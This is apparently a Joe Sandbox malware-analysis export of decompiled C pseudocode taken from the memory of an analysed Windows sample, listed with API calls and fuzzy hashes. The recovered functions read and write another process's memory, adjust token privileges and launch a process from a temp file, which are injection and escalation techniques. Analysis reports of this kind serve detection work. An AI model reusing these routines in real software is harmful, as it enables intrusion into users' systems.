                          										_t85 = _t85 + 1;
                          										if(_t85 < 2) {
                          											continue;
                          										}
                          										_t89 = 0;
                          										_t115 = _t85 - 2;
                          										if(_t85 == 2) {
                          											goto L31;
                          										}
                          										break;
                          									}
                          									E005C76A0(_t87, _t115);
                          									_t89 = 0;
                          									goto L31;
                          								}
                          								_t66 = E005C9CD0(_t48,  *(_t87 + 0x70), _t48, 0x184);
                          								_t91 =  &(_t90[3]);
                          								if(_t66 == 0) {
                          									goto L34;
                          								}
                          								_t76 = _t66;
                          								_t86 =  *((intOrPtr*)(_a20 + 0x180));
                          								if(_t86 == 0) {
                          									L18:
                          									_t84 = _a16;
                          									goto L19;
                          								} else {
                          									_t67 = 0;
                          									L13:
                          									L13:
                          									if( *((short*)(_t86 + _t67 * 2)) == 0) {
                          										__eflags = _t67;
                          										if(_t67 != 0) {
                          											_v32 = _t76;
                          											 *((intOrPtr*)(_a20 + 0x180)) = E005C9CD0(_t67,  *(_t87 + 0x70), _t86, _t67);
                          											E005C91E0(_t86);
                          											_t76 = _v32;
                          											_t90 =  &(_t91[4]);
                          										}
                          									} else {
                          										goto L14;
                          									}
                          									goto L18;
                          									L14:
                          									_t67 = _t67 + 1;
                          									if(_t67 != 0x7fffffff) {
                          										goto L13;
                          									} else {
                          										goto L18;
                          									}
                          								}
                          							}
                          							_t70 = E005C9CD0(_t47,  *(_t87 + 0x70), _t84, 0x400);
                          							_t76 = 0;
                          							_t91 =  &(_t90[3]);
                          							_t89 = _t70;
                          							if(_t70 == 0) {
                          								goto L39;
                          							}
                          							goto L9;
                          						}
                          						_t47 = E005C9CD0(_t47,  *(_t87 + 0x70), _t88, _t73);
                          						_t91 =  &(_t90[3]);
                          						_v36 = _t47;
                          						if(_t47 == 0) {
                          							goto L41;
                          						}
                          						goto L7;
                          					}
                          					_t47 = E005C9CD0( *0x5d9d28(_t83) + 1,  *(_t87 + 0x70), _t83, 0);
                          					_t91 =  &(_t90[3]);
                          					if(0 == 0) {
                          						goto L43;
                          					}
                          					goto L5;
                          				} else {
                          					goto L44;
                          				}
                          			}

                          APIs
                          • lstrlen.KERNEL32(?), ref: 005CC154
                          • ReadProcessMemory.KERNEL32(?,?,?,00000400,?), ref: 005CC286
                          • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 005CC2AC
                          • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 005CC2F0
                          • ReadProcessMemory.KERNEL32(?,?,?,00000400,?), ref: 005CC312
                          • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 005CC338
                          • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 005CC353
                          • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 005CC36C
                            • Part of subcall function 005C9CD0: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,00000000,?,00000000,?,?,005CDA93,?,?,00000080), ref: 005C9CE8
                            • Part of subcall function 005C9CD0: WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,005CDA93,?,?,00000080), ref: 005C9D07
                            • Part of subcall function 005C91E0: RtlFreeHeap.NTDLL(00000008,?,005C9F64), ref: 005C91F1
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: FreeVirtual$MemoryProcess$Read$AllocHeapWritelstrlen
                          • String ID:
                          • API String ID: 2758599655-0
                          • Opcode ID: 9f926145fae4058482084b8172112e67c8e8707971476fed0b23f84ba25455af
                          • Instruction ID: d18980752fca79ac02a0b8d658d0b265b20874ea41dab6d7d13709c8f7f4772d
                          • Opcode Fuzzy Hash: 9f926145fae4058482084b8172112e67c8e8707971476fed0b23f84ba25455af
                          • Instruction Fuzzy Hash: EA619E74604701AFE7219BA5DC09F2BBFE9FB80704F14482DFA99962A1EB71EC01DB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 76%
                          			E005C5150(void* __ecx, void* __eflags) {
                          				intOrPtr _t26;
                          				intOrPtr _t27;
                          				void* _t29;
                          				void* _t30;
                          				WCHAR* _t36;
                          				void* _t37;
                          				int _t38;
                          				intOrPtr _t39;
                          				WCHAR* _t44;
                          				struct _PROCESS_INFORMATION* _t46;
                          				struct _STARTUPINFOW* _t52;
                          				void* _t53;
                          				WCHAR* _t57;
                          				struct _STARTUPINFOW* _t58;
                          				LPWSTR* _t59;
                          				WCHAR** _t60;
                          				intOrPtr _t62;
                          
                          				_t47 = __ecx;
                          				_t53 = __ecx;
                          				_t52 = _t58;
                          				E005D6610(_t52, 0, 0x530);
                          				_t59 =  &(_t58->lpTitle);
                          				_t62 =  *0x5d9ae8; // 0x0
                          				if(_t62 == 0) {
                          					_push(0);
                          					return E005C43E0(_t53, __eflags);
                          				}
                          				E005C8CD0(_t47);
                          				_t60 =  &(_t59[1]);
                          				_t44 =  &(_t60[0x1a]);
                          				 *_t44 = 0;
                          				 *(_t44 - 0xc) = _t44;
                          				_t26 =  *0x5d9de4(0, 0x1c,  *((intOrPtr*)(_t44 - 0x10)), 0, _t44,  &(_t59[0x16]));
                          				_t63 = _t26;
                          				 *((intOrPtr*)(_t44 - 8)) = _t26;
                          				if(_t26 < 0) {
                          					_t60[0x17] = 0;
                          					_t27 = 0;
                          					__eflags = 0;
                          				} else {
                          					_t57 =  &(_t60[0x11a]);
                          					E005D4520(_t57, 0x78);
                          					_t60 =  &(_t60[2]);
                          					GetTempFileNameW(_t44, _t57, 0, _t44);
                          					_t27 =  *((intOrPtr*)(_t57 - 0x40c));
                          				}
                          				_push(0);
                          				_push(0);
                          				if(E005CFA90(_t53, _t63, _t27,  &(_t60[0x15]), 0) == 0) {
                          					L11:
                          					_t29 = _t60[0x11];
                          					if(_t29 != 0) {
                          						CloseHandle(_t29);
                          					}
                          					_t30 = _t60[0x12];
                          					if(_t30 != 0) {
                          						CloseHandle(_t30);
                          					}
                          					_t31 = _t60[0x15];
                          					if(_t60[0x15] != 0) {
                          						E005C91E0(_t31);
                          						_t60 =  &(_t60[1]);
                          					}
                          					return _t60[0x19];
                          				} else {
                          					_t36 = _t60[0x15];
                          					if(_t36 == 0) {
                          						goto L11;
                          					}
                          					_t46 =  &(_t60[0x11]);
                          					_push(0);
                          					_push(0);
                          					_push(0x420);
                          					_push(_t36);
                          					_push( &(_t60[0x12]));
                          					_t37 = E005C5470(_t46);
                          					_t60 =  &(_t60[6]);
                          					if(_t37 == 0) {
                          						 *_t60 = 0x44;
                          						GetStartupInfoW(_t52);
                          						_t38 = CreateProcessW(_t60[0x1e], 0, 0, 0, 0, 0, 0, 0, _t52, _t46);
                          						__eflags = _t38;
                          						if(_t38 == 0) {
                          							_t39 =  *0x5d9b0c; // 0x26f2b8
                          							 *((intOrPtr*)(_t39 + 8)) = 7;
                          							goto L11;
                          						}
                          						L10:
                          						_t60[0x19] = 1;
                          						goto L11;
                          					}
                          					CloseHandle(_t60[0x11]);
                          					CloseHandle(_t60[0x12]);
                          					goto L10;
                          				}
                          			}

                          APIs
                            • Part of subcall function 005C8CD0: GetCurrentProcess.KERNEL32 ref: 005C8D0D
                            • Part of subcall function 005C8CD0: OpenProcessToken.ADVAPI32(00000000,00000028), ref: 005C8D19
                            • Part of subcall function 005C8CD0: LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 005C8D3A
                            • Part of subcall function 005C8CD0: AdjustTokenPrivileges.ADVAPI32(00000000,00000000,?,00000010,?,?), ref: 005C8D68
                            • Part of subcall function 005C8CD0: RevertToSelf.ADVAPI32 ref: 005C8DD9
                          • SHGetFolderPathW.SHELL32(00000000,0000001C,?,00000000,?), ref: 005C5198
                          • GetTempFileNameW.KERNEL32(?,?,00000000,?), ref: 005C51BC
                          • CloseHandle.KERNEL32(?), ref: 005C522A
                          • CloseHandle.KERNEL32(?), ref: 005C5230
                          • GetStartupInfoW.KERNEL32 ref: 005C523C
                          • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 005C524F
                          • CloseHandle.KERNEL32(?), ref: 005C526A
                          • CloseHandle.KERNEL32(?), ref: 005C5279
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: CloseHandle$Process$Token$AdjustCreateCurrentFileFolderInfoLookupNameOpenPathPrivilegePrivilegesRevertSelfStartupTempValue
                          • String ID:
                          • API String ID: 2859521768-0
                          • Opcode ID: 829939c596b33584a22eebb876ee542050536d28955dd108e985d577321dcd52
                          • Instruction ID: 4708b2b29a5c7c788e4bd9241ebc8e3a23195462a1a0930215dca746f112340e
                          • Opcode Fuzzy Hash: 829939c596b33584a22eebb876ee542050536d28955dd108e985d577321dcd52
                          • Instruction Fuzzy Hash: 5231A275604304AFEB209BE1DC89F2BBFECFB91784F04441EF94586290EA35EC48DA61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E005CCE40(long _a4) {
                          				WCHAR* _v0;
                          				short _v536;
                          				union _SID_NAME_USE _v540;
                          				char _v544;
                          				WCHAR* _v548;
                          				void* _v552;
                          				void* _t16;
                          				void* _t20;
                          				void* _t25;
                          				DWORD* _t28;
                          				long _t29;
                          				DWORD* _t30;
                          				DWORD* _t34;
                          				long _t35;
                          				void* _t36;
                          				void* _t37;
                          				HANDLE* _t39;
                          
                          				_t35 = 0;
                          				_v548 = 0;
                          				_t16 = OpenProcess(0x400, 0, _a4);
                          				if(_t16 == 0) {
                          					L13:
                          					return _t35;
                          				}
                          				_t37 = _t16;
                          				if(OpenProcessToken(_t37, 8, _t39) == 0) {
                          					L9:
                          					_t35 = 0;
                          					L10:
                          					_t20 = _v548;
                          					if(_t20 != 0) {
                          						CloseHandle(_t20);
                          					}
                          					CloseHandle(_t37);
                          					goto L13;
                          				}
                          				_t36 = 0;
                          				_t30 =  &_v544;
                          				 *_t30 = 0;
                          				if(GetTokenInformation(_v548, 1, 0, 0, _t30) == 0) {
                          					if(GetLastError() != 0x7a) {
                          						goto L9;
                          					}
                          					_t25 = E005C3180(_v548, 0);
                          					if(_t25 == 0) {
                          						goto L9;
                          					}
                          					_t36 = _t25;
                          				}
                          				if(GetTokenInformation(_v552, 1, _t36, _v548, _t30) == 0) {
                          					goto L9;
                          				}
                          				_t34 =  &_v548;
                          				_v0 = 0;
                          				 *_t34 = _a4;
                          				_t28 =  &_v544;
                          				 *_t28 = 0x100;
                          				 *_v0 = 0;
                          				_t29 = LookupAccountSidW(0,  *_t36, _v0, _t34,  &_v536, _t28,  &_v540);
                          				_t35 = _t29;
                          				if(_t29 != 0) {
                          					_t35 = _v548;
                          				}
                          				goto L10;
                          			}

                          APIs
                          • OpenProcess.KERNEL32(00000400,00000000,?), ref: 005CCE5D
                          • OpenProcessToken.ADVAPI32(00000000,00000008), ref: 005CCE73
                          • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 005CCE92
                          • GetTokenInformation.ADVAPI32(00000001,00000001(TokenIntegrityLevel),00000000,?,?), ref: 005CCEA8
                          • LookupAccountSidW.ADVAPI32(00000000,00000000,?,?,?,?,?), ref: 005CCEED
                          • GetLastError.KERNEL32 ref: 005CCEFF
                          • CloseHandle.KERNEL32(00000000), ref: 005CCF2D
                          • CloseHandle.KERNEL32(00000000), ref: 005CCF34
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: Token$CloseHandleInformationOpenProcess$AccountErrorLastLookup
                          • String ID:
                          • API String ID: 2338897050-0
                          • Opcode ID: aa2923d4844f8afaa5b4982820c6b9c5e17ba5aa3247c7f852e2483adc24fdb1
                          • Instruction ID: 56c4805373dabf74fac00c11bceb17d3424f005d79024ccaff1d36cba5c5444d
                          • Opcode Fuzzy Hash: aa2923d4844f8afaa5b4982820c6b9c5e17ba5aa3247c7f852e2483adc24fdb1
                          • Instruction Fuzzy Hash: EB312971205241AFD7219FA2DC88FABBFEDFF95740F04481EF44A862A0DB709809DB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E005CB3F0(void* __ecx, intOrPtr* _a4, intOrPtr* _a8, void** _a12, long* _a16, intOrPtr* _a20) {
                          				intOrPtr _v20;
                          				void* _v24;
                          				long _v28;
                          				void* _v32;
                          				void* _v36;
                          				void* _v40;
                          				void _v44;
                          				char _v48;
                          				char _v52;
                          				char _v56;
                          				void* _v60;
                          				void* _v64;
                          				void* _v68;
                          				long _v72;
                          				intOrPtr _v76;
                          				void _v80;
                          				void _t65;
                          				long _t79;
                          				void* _t81;
                          				void* _t82;
                          				void* _t84;
                          				void* _t88;
                          				void* _t89;
                          				void* _t90;
                          				long _t91;
                          				void* _t93;
                          				void* _t97;
                          				void* _t100;
                          				void* _t103;
                          				intOrPtr* _t104;
                          				void* _t105;
                          				long _t106;
                          				intOrPtr _t110;
                          				long _t111;
                          				intOrPtr* _t131;
                          				void* _t132;
                          				DWORD* _t133;
                          				void* _t134;
                          				long* _t135;
                          				intOrPtr* _t136;
                          				DWORD* _t139;
                          
                          				_t134 = __ecx;
                          				memset( &_v80, 0, 0x10 << 2);
                          				_t139 =  &(( &_v68)[3]);
                          				if( *((intOrPtr*)(_t134 + 0x80)) != 0) {
                          					_t79 = WaitForSingleObject( *(_t134 + 0x90), 0);
                          					_v72 = _t79;
                          					if(_t79 == 0x102) {
                          						_v76 = 1;
                          						_t81 = E005C3180(0x80, 0);
                          						_t132 = _t81;
                          						_v68 = _t81;
                          						_t82 = E005C3180(0x400, 0);
                          						_t105 = _t82;
                          						_v64 = _t82;
                          						_t84 = E005C3180(0x80, 0);
                          						_t139 =  &(_t139[6]);
                          						_v60 = _t84;
                          						if(_t84 != 0 && _t132 != 0 && _t105 != 0) {
                          							_t133 = _t139;
                          							 *_t133 = 0;
                          							if(ReadProcessMemory( *(_t134 + 0x70),  *((intOrPtr*)(_t134 + 0x94)) + 0x34,  &_v44, 0x1c, _t133) != 0 &&  *_t139 == 0x1c && _v20 ==  *((intOrPtr*)(_t134 + 0x94))) {
                          								_t88 = _v40;
                          								if(_t88 == 0) {
                          									L32:
                          									_t89 = _v36;
                          									if(_t89 == 0) {
                          										L36:
                          										_t90 = _v24;
                          										if(_t90 == 0) {
                          											L40:
                          											_t91 = _v28;
                          											if(_t91 == 0 || _v32 == 0) {
                          												 *_a12 = 0;
                          												goto L48;
                          											} else {
                          												if(_t91 <= 0x8000000) {
                          													_t93 = E005C3180(_t91, 0);
                          													_t139 =  &(_t139[2]);
                          													 *_a12 = _t93;
                          													if(_t93 != 0) {
                          														_t106 = _v28;
                          														 *_t139 = 0;
                          														if(ReadProcessMemory( *(_t134 + 0x70), _v32, _t93, _t106, _t133) != 0) {
                          															if( *_t139 == _t106) {
                          																L48:
                          																_v80 = 1;
                          															} else {
                          															}
                          														}
                          													}
                          												}
                          											}
                          										} else {
                          											 *_t139 = 0;
                          											if(ReadProcessMemory( *(_t134 + 0x70), _t90, _v60, 0x7f, _t133) == 0 ||  *_t139 != 0x7f) {
                          												goto L40;
                          											} else {
                          												 *((char*)( *((intOrPtr*)( &_v48 - 0xc)) + 0x7f)) = 0;
                          												_t97 = E005CC380( *((intOrPtr*)( &_v48 - 0xc)), 0,  &_v48, 0xffffffff);
                          												_t139 =  &(_t139[4]);
                          												if(_t97 != 0) {
                          													goto L40;
                          												}
                          											}
                          										}
                          									} else {
                          										 *_t139 = 0;
                          										if(ReadProcessMemory( *(_t134 + 0x70), _t89, _v64, 0x3ff, _t133) == 0 ||  *_t139 != 0x3ff) {
                          											goto L36;
                          										} else {
                          											 *((char*)( *((intOrPtr*)( &_v52 - 0xc)) + 0x3ff)) = 0;
                          											_t100 = E005CC380( *((intOrPtr*)( &_v52 - 0xc)), 0,  &_v52, 0xffffffff);
                          											_t139 =  &(_t139[4]);
                          											if(_t100 != 0) {
                          												goto L36;
                          											}
                          										}
                          									}
                          								} else {
                          									 *_t139 = 0;
                          									if(ReadProcessMemory( *(_t134 + 0x70), _t88, _v68, 0x7f, _t133) != 0 &&  *_t139 == 0x7f) {
                          										 *((char*)( *((intOrPtr*)( &_v56 - 0xc)) + 0x7f)) = 0;
                          										_t103 = E005CC380( *((intOrPtr*)( &_v56 - 0xc)), 0,  &_v56, 0xffffffff);
                          										_t139 =  &(_t139[4]);
                          										if(_t103 != 0) {
                          											goto L32;
                          										}
                          									}
                          								}
                          							}
                          						}
                          					}
                          				}
                          				if(_v76 != 0) {
                          					SetEvent( *(_t134 + 0x90));
                          				}
                          				_t62 = _v68;
                          				if(_v68 != 0) {
                          					E005C91E0(_t62);
                          					_t139 =  &(_t139[1]);
                          				}
                          				_t63 = _v64;
                          				if(_v64 != 0) {
                          					E005C91E0(_t63);
                          					_t139 =  &(_t139[1]);
                          				}
                          				_t64 = _v60;
                          				if(_v60 != 0) {
                          					E005C91E0(_t64);
                          					_t139 =  &(_t139[1]);
                          				}
                          				_t65 = _v80;
                          				_t131 = _a20;
                          				_t135 = _a16;
                          				_t104 = _a8;
                          				_t136 = _a4;
                          				_t110 = _v56;
                          				if(_t65 == 0) {
                          					if(_t110 != 0) {
                          						E005C91E0(_t110);
                          						_t139 =  &(_t139[1]);
                          					}
                          					_t66 = _v52;
                          					if(_v52 != 0) {
                          						E005C91E0(_t66);
                          						_t139 =  &(_t139[1]);
                          					}
                          					_t67 = _v48;
                          					if(_v48 != 0) {
                          						E005C91E0(_t67);
                          						_t139 =  &(_t139[1]);
                          					}
                          					_t69 =  *_a12;
                          					if( *_a12 != 0) {
                          						E005C91E0(_t69);
                          					}
                          					_t111 = 0;
                          					 *_t131 = 0;
                          					 *_t104 = 0;
                          					 *_t136 = 0;
                          					 *_a12 = 0;
                          					_t65 = _v80;
                          				} else {
                          					 *_t136 = _t110;
                          					 *_t104 = _v52;
                          					 *_t131 = _v48;
                          					_t111 = _v28;
                          				}
                          				 *_t135 = _t111;
                          				return _t65;
                          			}

                          APIs
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 005CB41B
                          • ReadProcessMemory.KERNEL32(?,?,?,0000001C), ref: 005CB4A0
                          • SetEvent.KERNEL32(?), ref: 005CB4CD
                          • ReadProcessMemory.KERNEL32(?,?,?,0000007F), ref: 005CB5B4
                          • ReadProcessMemory.KERNEL32(?,?,?,000003FF), ref: 005CB60C
                          • ReadProcessMemory.KERNEL32(?,?,?,0000007F), ref: 005CB65F
                            • Part of subcall function 005C3180: GetProcessHeap.KERNEL32(00000000,00000000,005D2549,?,00000000,00000001,00000000), ref: 005C3193
                            • Part of subcall function 005C3180: RtlReAllocateHeap.NTDLL(00230000,00000008,?,?), ref: 005C31B0
                            • Part of subcall function 005C3180: RtlAllocateHeap.NTDLL(00230000,00000008,?), ref: 005C31BC
                          • ReadProcessMemory.KERNEL32(?,?,00000000,?), ref: 005CB6DA
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
• Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
• Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: Process$MemoryRead$Heap$Allocate$EventObjectSingleWait
                          • String ID:
                          • API String ID: 1187518971-0
                          • Opcode ID: 79eb7b7d377b0d639a640e89eb3040083de0440c8c71e6c10ab4330705668fc9
                          • Instruction ID: 34b17c74b476ddcd113e0657a9e029224b4b40427a4e67493b5ea5eba2bf1e06
                          • Opcode Fuzzy Hash: 79eb7b7d377b0d639a640e89eb3040083de0440c8c71e6c10ab4330705668fc9
                          • Instruction Fuzzy Hash: 4A9150B46083059FEB24DF64D88AF2BBBE9BF84744F04492DF88597391D734E944CA62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 77%
                          			E005C3240(intOrPtr* _a4, WCHAR* _a8, intOrPtr _a12) {
                          				void* _v16;
                          				char _v236;
                          				intOrPtr _v248;
                          				intOrPtr _v252;
                          				intOrPtr _v256;
                          				intOrPtr _v260;
                          				char _v264;
                          				intOrPtr _v272;
                          				intOrPtr* _v276;
                          				intOrPtr _v280;
                          				char _v284;
                          				char _v288;
                          				intOrPtr _v292;
                          				intOrPtr* _v296;
                          				intOrPtr _v300;
                          				intOrPtr _v304;
                          				intOrPtr _v308;
                          				char _v312;
                          				short _v316;
                          				intOrPtr _v320;
                          				char _v328;
                          				char _v332;
                          				intOrPtr* _v336;
                          				void* _v340;
                          				intOrPtr* _v344;
                          				intOrPtr _v348;
                          				intOrPtr* _v352;
                          				intOrPtr* _v356;
                          				char _v360;
                          				WCHAR* _v364;
                          				WCHAR* _v368;
                          				WCHAR* _v372;
                          				WCHAR* _v376;
                          				intOrPtr* _t102;
                          				intOrPtr _t104;
                          				intOrPtr* _t105;
                          				intOrPtr* _t107;
                          				intOrPtr* _t109;
                          				void* _t110;
                          				intOrPtr* _t111;
                          				intOrPtr* _t113;
                          				intOrPtr* _t115;
                          				void* _t117;
                          				void* _t120;
                          				intOrPtr* _t121;
                          				intOrPtr* _t123;
                          				void* _t126;
                          				intOrPtr* _t128;
                          				void* _t129;
                          				intOrPtr* _t130;
                          				intOrPtr* _t132;
                          				void* _t133;
                          				intOrPtr* _t144;
                          				char* _t148;
                          				WCHAR* _t149;
                          				intOrPtr* _t153;
                          				intOrPtr _t162;
                          				intOrPtr _t163;
                          				intOrPtr* _t172;
                          				intOrPtr _t180;
                          				short _t181;
                          				intOrPtr* _t186;
                          				intOrPtr* _t188;
                          				char* _t191;
                          				signed int _t193;
                          				void* _t195;
                          
                          				_t195 = (_t193 & 0xfffffff8) - 0x128;
                          				_t172 = _a4;
                          				_t102 =  &_v264;
                          				 *_t102 = 0;
                          				_push(_t102);
                          				_push(1);
                          				_push(_t172);
                          				if( *((intOrPtr*)( *_t172 + 0x38))() < 0) {
                          					_t104 = 0;
                          					L26:
                          					return _t104;
                          				}
                          				_t105 = _v276;
                          				_t186 =  &_v236;
                          				 *_t186 = 0;
                          				 *((intOrPtr*)( *_t105 + 0x1c))(_t105, _t186);
                          				_v320 = 0;
                          				if( *_t186 <= 0) {
                          					L20:
                          					_t107 = _v284;
                          					 *((intOrPtr*)( *_t107 + 8))(_t107);
                          					_t153 = _a4;
                          					_t109 =  &_v332;
                          					 *_t109 = 0;
                          					_t110 =  *((intOrPtr*)( *_t153 + 0x28))(_t153, 0, _t109);
                          					_t104 = 0;
                          					if(_t110 < 0) {
                          						goto L26;
                          					}
                          					_t111 = _v344;
                          					_t180 = 0;
                          					_t188 =  &_v340;
                          					 *_t188 = 0;
                          					 *((intOrPtr*)( *_t111 + 0x1c))(_t111, _t188);
                          					if( *_t188 <= 0) {
                          						L25:
                          						_t113 = _v352;
                          						 *((intOrPtr*)( *_t113 + 8))(_t113);
                          						_t104 = _v348;
                          						goto L26;
                          					} else {
                          						goto L22;
                          					}
                          					do {
                          						L22:
                          						_t181 = _t180 + 1;
                          						_v340 = 3;
                          						_t115 = _v352;
                          						_v312 = 0;
                          						_v332 = _t181;
                          						_v292 = _t181;
                          						_v316 = _t181;
                          						_v296 = _v336;
                          						_v288 = _v328;
                          						_v300 = _v340;
                          						_v320 =  *_t115;
                          						_t117 =  *((intOrPtr*)(_v320 + 0x20))(_t115, _v300, _v296, _v292, _v288,  &_v312);
                          						 *0x5d9ddc( &_v364);
                          						if(_t117 >= 0) {
                          							_t120 = E005C3240(_v340, _a8, _a12);
                          							_t195 = _t195 + 0xc;
                          							_v372 = _v372 + _t120;
                          							_t121 = _v340;
                          							 *((intOrPtr*)( *_t121 + 8))(_t121);
                          						}
                          						_t180 = _v344;
                          					} while (_t180 < _v376);
                          					goto L25;
                          				}
                          				_t162 = 0;
                          				_t191 =  &_v316;
                          				_v320 = 0;
                          				do {
                          					_t163 = _t162 + 1;
                          					_v316 = 3;
                          					_t123 = _v284;
                          					_v328 = 0;
                          					_t148 = _t191;
                          					_v308 = _t163;
                          					_v280 = _t163;
                          					_v252 = _t163;
                          					_v296 = _t123;
                          					_v256 = _v312;
                          					_v248 = _v304;
                          					_v260 = _v316;
                          					_v292 =  *_t123;
                          					_t126 =  *((intOrPtr*)(_v292 + 0x20))(_v296, _v260, _v256, _v252, _v248,  &_v328);
                          					 *0x5d9ddc(_t148);
                          					if(_t126 < 0) {
                          						_t162 = _v308;
                          						_t191 = _t148;
                          						goto L19;
                          					}
                          					_t128 = _v356;
                          					_v344 = 0;
                          					_t129 =  *((intOrPtr*)( *_t128 + 0x1c))(_t128, _t148);
                          					_t191 = _t148;
                          					if(_t129 < 0) {
                          						L18:
                          						_t130 = _v364;
                          						 *((intOrPtr*)( *_t130 + 8))(_t130);
                          						_t162 = _v320;
                          						goto L19;
                          					}
                          					_t132 = _v364;
                          					_v360 = 0;
                          					_t133 =  *((intOrPtr*)( *_t132 + 0x50))(_t132,  &_v360);
                          					_t149 =  &_v284;
                          					if(_t133 < 0) {
                          						L17:
                          						 *((intOrPtr*)( *0x5d9dd8))(_v360);
                          						goto L18;
                          					}
                          					if(StrStrIW(_v368, _a8) == 0) {
                          						L16:
                          						 *0x5d9dd8(_v372);
                          						goto L17;
                          					}
                          					E005D4520(_t149, 0x20);
                          					_t195 = _t195 + 8;
                          					if(lstrcmpW(_v364, _t149) == 0) {
                          						E005D4520(_t149, 0x21);
                          						_t195 = _t195 + 8;
                          						if(StrStrIW(_v372, _t149) != 0) {
                          							L15:
                          							_v372 =  &(_v372[0x200]);
                          							goto L16;
                          						}
                          						E005D4520(_t149, 0x22);
                          						_t195 = _t195 + 8;
                          						if(StrStrIW(_v376, _t149) == 0) {
                          							_v376 =  &(_v376[0]);
                          							goto L16;
                          						}
                          						goto L15;
                          					}
                          					if(_a12 != 0) {
                          						_t144 = _a4;
                          						 *((intOrPtr*)( *_t144 + 0x3c))(_t144, _v364, 0);
                          					}
                          					goto L16;
                          					L19:
                          				} while (_t162 < _v272);
                          				goto L20;
                          			}

                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
• Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
• Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: ClearVariant$FreeStringlstrcmp
                          • String ID:
                          • API String ID: 1296292621-0
                          • Opcode ID: 3cd247a3a90157d705f1fb2504c4d660c0732465bd2f154738ecc0afe0cee9a6
                          • Instruction ID: 486498963b6594de55a653f156f0bbe020e4bcef623a2533c98bdab0aa2ac2f3
                          • Opcode Fuzzy Hash: 3cd247a3a90157d705f1fb2504c4d660c0732465bd2f154738ecc0afe0cee9a6
                          • Instruction Fuzzy Hash: 6E91FDB5608305AFC704DF64C888A1BBBE9FFC8714F10891DF88A87260DB71E905CB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 97%
                          			E005C43E0(void* __ecx, void* __eflags) {
                          				void* _t49;
                          				void* _t50;
                          				int _t58;
                          				intOrPtr _t59;
                          				WCHAR* _t60;
                          				short* _t61;
                          				intOrPtr _t64;
                          				signed int _t73;
                          				void* _t77;
                          				WCHAR* _t78;
                          				signed int _t79;
                          				WCHAR* _t81;
                          				intOrPtr _t87;
                          				intOrPtr _t88;
                          				signed int _t89;
                          				signed int _t93;
                          				signed int _t94;
                          				WCHAR* _t98;
                          				void* _t99;
                          				struct _STARTUPINFOW* _t100;
                          				void* _t101;
                          				void* _t102;
                          				intOrPtr* _t103;
                          				void* _t104;
                          				void* _t105;
                          
                          				_t105 = __eflags;
                          				_t77 = _t102;
                          				_t99 = __ecx;
                          				E005D6610(_t77, 0, 0x56c);
                          				_t103 = _t102 + 0xc;
                          				_push(0);
                          				_push(0);
                          				if(E005CFA90(_t99, _t105, 0, _t77, 0) == 0 ||  *_t103 == 0) {
                          					L26:
                          					_t49 =  *(_t103 + 0x4c);
                          					if(_t49 != 0) {
                          						CloseHandle(_t49);
                          					}
                          					_t50 =  *(_t103 + 0x50);
                          					if(_t50 != 0) {
                          						CloseHandle(_t50);
                          					}
                          					_t51 =  *_t103;
                          					if( *_t103 != 0) {
                          						E005C91E0(_t51);
                          						_t103 = _t103 + 4;
                          					}
                          					return  *((intOrPtr*)(_t103 + 4));
